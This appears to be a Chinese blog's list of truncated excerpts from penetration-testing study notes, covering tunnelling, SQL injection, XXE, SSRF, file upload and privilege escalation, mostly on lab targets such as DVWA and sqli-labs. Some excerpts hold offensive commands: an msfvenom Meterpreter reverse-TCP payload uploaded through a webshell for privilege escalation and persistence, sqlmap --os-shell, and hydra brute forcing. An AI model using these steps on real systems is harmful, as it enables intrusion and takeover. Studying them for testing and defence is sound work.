内网常用隧道笔记 netsh转发适用情况A主机可以访问B主机,B可以访问C主机,但A主机不能访问C主机。主机情况A主机有B主机的控制权限。B主机需要有ipv6才可以进行portproxy。没有防火墙进行流量拦截常用命令netsh interface portproxy add v4tov4 listenport=访问端口 listenaddress=监听ip connectaddress=转发ip connectport=转发端口netsh interface portproxy add
app测试基础篇 前言本文主要是app测试中常见工具的使用,都是报告上的东西主要是备忘,萌新笔记大佬轻喷。客户端应用测试一、数字签名验证:1.数字签名作用:①.签名就是app的身份,安卓系统只会接受有证书app的安装请求。②.当两个apk包名相同时,系统就会对以安装的apk进行覆盖,这时就需要两个apk的签名一致。总的来说数字签名的作用就是为了让内容不被篡改。2.通用证书,第三方证书的不安全性:①如果攻击者拿到了开发者的签名证书,就可以直接替换掉原apk的内容。恶意app会被当做正常app被下载。3.利用
MSF进行windows提权 主要思路1.拿到webshell2.上传大马3.利用meterpreter模块生成payload4.本地进行监听5.进行提权6.进行维权7.生成新用户,连接3389一、本地监听端口①.生成payloadmsfvenom -p windows/meterpreter/reverse_tcp lhost= x.x.x.x lport=xxx -f exe >xxxx/123.exe②.上传123.exe这里直接在大马上进行上传运行即可。(随便找一个有执行权限的目录即可)③.m
sqlmap提权 mysql提权一.os-shell提权建立os-shell前提条件:①必须要有dba权限②secure_file_priv必须为空,不然无法写入文件这是secure_file_priv为null的情况下这是secure_file_priv为空的情况下③知道网站的绝对路径1、首先查看当前用户权限,是dba后进行os-shell建立2、sqlmap -u “http://192.168.43.194/sqli/Less-1/?id=1” --os-shell在这里选择网页语言,根据网页
JSON劫持 【技术工场】“JSON劫持漏洞”分析2019-05-29 17:30 // 转载前 言JSON(Java Object Notation) 是一种轻量级的数据交换格式,易于阅读和编写,同时也易于机器解析和生成。JSON采用完全独立于语言的文本格式,但是也使用了类似于C语言家族的习惯。这些特性使JSON成为理想的数据交换语言。这种纯文本的数据交互方式由于可以天然的在浏览器中使用,所以随着ajax和web业务的发展得到了广大的发展,但是如果这种交互的方式用来传递敏感的数据,并且传输的时
业务逻辑漏洞之登录、支付漏洞、伪随机验证码、密码找回 登录漏洞原理因为http连接,或者是cookie和session验证不完全导致的任意用户登录的漏洞。漏洞利用1.暴力破解在http中,报文是以明文传输的。我们可以直接使用burp进行暴力破解。而对于https来讲密码一般是以密文来进行传输的,我们在这种情况下就不能直接爆破,而是要知道报文的加密类型,然后再intrude模块中进行选择。2.cookie脆弱性漏洞产生原因例如一个系统再源码中的cookie验证只是验证了有没有cookie,只要不为空就执行跳转,而没有对内容进行限制。这样就随便加一
业务逻辑漏洞之水平越权和垂直越权 越权漏洞原理浏览器对用户提交的数据请求没有经过严格的权限设置,导致用户可以拥有观察或更改其他用户信息的功能。越权漏洞被分为两类一类是水平越权,一类是垂直越权。水平越权 :用户在权限相同级别下的组,可以进行越权访问、修改、删除数据。垂直越权 :用户在不同权限下的组,可以进行高级别的权限使用。漏洞成因前端原因:只对页面进行更高权限的隐藏实际上并没有对后端的进行一个权限过滤,只是对前端进行隐藏。根据用户权限的判断,进行选择显示,但是功能点还是可以触发。正确的做法应该是用户权限与功能点进行绑定。
文件下载漏洞 文件下载漏洞原理假如网页上有文件下载的一个功能点,但是没有对用户可下载文件类型进行一个限制,就会构成问价下载的一个漏洞。利用条件:1.用户可控下载地址2.用户知道想要下载的文件路径,以及在哪个文件夹下3.服务端对下载文件没有限制注入点:1.url参数查找• download.php?path= • download.php?file= • down.php?file= • data.php?file= • readfile.php?file= • re
命令执行及代码执行 命令执行及代码执行漏洞原理命令执行和代码执行漏洞是因为在代码中有进行执行的函数,但是有没有对用户可控数据进行过滤,所以形成了这个漏洞。命令执行常见函数。system:执行一个外部的应用程序并显示输出的结果。exec:执行一个外部的应用程序。shell_exec:执行shell命令并返回输出的结果的字符串。passthru:执行一个UNIX系统命令并显示原始的输出。popen():打开到命令参数中指定的程序的管道,如果发生错误,则返回false。proc_open: 执行一个命令,并且打开用
XXE XXE原理介绍XXE Injection即XML External Entity Injection。也就是外部实体注入攻击。漏洞是由在处理不安全的外部实体数据时造成的。在了解xxe漏洞之前我们需要对xml有所了解。xmlxml与html的区别为:xml是传输和储存数据的。html的作用是显示数据的。xml的结构是树结构,从根出发再到叶<?xml version="1.0" encoding="UTF-8"?> //表达版本和编码方式<note>
SSRF原理及bwapp小案例 原理ssrf(Server-Side Request Forgery:服务器端请求伪造)是通过由攻击者构造由服务端发送请求的漏洞。漏洞危害漏洞利用点利用方法修复方案bwapp ssrf可以看到我们这里有3个实验1.文件包含进行端口扫描2.xxe获取敏感内容文件包含进行端口扫描我们先来看一看端口扫描的源代码<?php/*bWAPP, or a buggy web application, is a free and open source deliberately ins
PHP反序列化 引用文章大佬写的,建议直接看他的 作者:KeefePHP反序列化和序列化方法php用serialize和unserialize着两个函数进行序列化和反序列化序列化的含义为:将类与对象转换为可以存储的值,可以储存在任何地方,而且不会破坏类型和结构。反序列化的含义为:将字符串转化为php值。魔术函数触发条件__construct 当一个对象创建时被调用,__destruct 当一个对象销毁时被调用,__toString 当一个对象被当作一个字符串被调用。__wakeup()
信息收集工具使用 masscan端口信息搜集masscan -p 0-65535 ipaddress --rate 10000nampnmap -A -sC -p 443,80,23,21,3306,3309,53,5040hydrahydra -L username.txt -P password.txt mysql://ipadress
dvwa中的文件上传模块解析 文件上传原理原理:文件上传就是对服务端上传文件,因服务端对文件类型过滤不严格导致恶意文件被解析,导致服务端的权限泄露。文件上传的条件:1.可以上传文件2.上传的文件可以被服务器解析3.可以找到上传文件的路径dvwa练习LOW我们先看看low级别的代码1.首先使用isset()函数进行变量测试们是否点击了upload2.然后进行一个变量上传路径的定义。用.=进行连续变量定义。3.对文件是否上传到临时目录进行判断从源代码我们可以看出并没有对上传文件进行任何过滤我们直接上传一个一句话&l
最全的SQL注入总结(转载) 转载至:最全的SQL注入总结SQL注入原理当客户端提交的数据未作处理或转义直接带入数据库,就造成了sql注入。攻击者通过构造不同的sql语句来实现对数据库的任意操作。SQL注入的分类按变量类型分:数字型和字符型按HTTP提交方式分:POST注入、GET注入和Cookie注入按注入方式分:布尔注入、联合注入、多语句注入、报错注入、延时注入、内联注入按数据库类型分:sql:oracle、MySQL、mssql、access、sqlite、postgersqlnosql:mongodb、redi
post 基于错误的注入 sqli-lab get注入与post注入区别get注入可以直接在URL上进行传输参数。post注入是基于输入框进行注入,所以得使用辅助工具进行注入。post注入的两个前提:1.输入框可以交互2.输入的语句会进入到数据库进行信息查找下面我们用sqli-lab less11来举一个例子less11首先我们使用brupsuite进行信息拦截。这里我们得到了发给web的http请求。我们把这条信息发送到repeater上进行注入。我们可以先对sql语句进行判断。select uname,passwd form
修改secure_file_priv的值后,仍然没有生效。 我的之前的问题是使用phpstudy后,它在自己的安装目录下生成了一个my.ini(在安装phpstuay前系统里就存在mysql)。改了这个文件以后仍然没有生效,后来才发现是要在原mysql路径下修改my.ini才可以成功。希望能对使用phpstudy的用户产生一点帮助。...
sql注入基于字符型和数字型 less1他这里是让我们插入一个id值我们写入http://192.168.88.145/sqli/Less-1/?id=1依次测试到15,发现id=15页面不再输出信息。可得数据库id只写到14。我们对报错信息进行解析:‘‘14’’ LIMIT 0,1’剔除一对单引号‘14’’ LIMIT 0,1剔除我们输入的内容‘’ LIMIT 0,1这里我们可以猜测sql语句内容select Login_name,Pssword from table where ‘id=14’ limit
linux基础命令 查看网卡命令ifconfigeno表示一块网卡 flags使网络设备的状态标识符 最大传输单元1500字节inet为网卡地址 掩码24位 广播地址为192.168.126.255lo表示环回网卡,一般用于测试网络程序,可以不让局域网和外网用户看到,只在本机上运行和观察所用接口。1.网卡开关命令ifconfig <网卡名称> up/down2.设置最大传输单元ifconfig eno mtu xx3.配置IP地址ifconfig eno x.x.x.x用户命令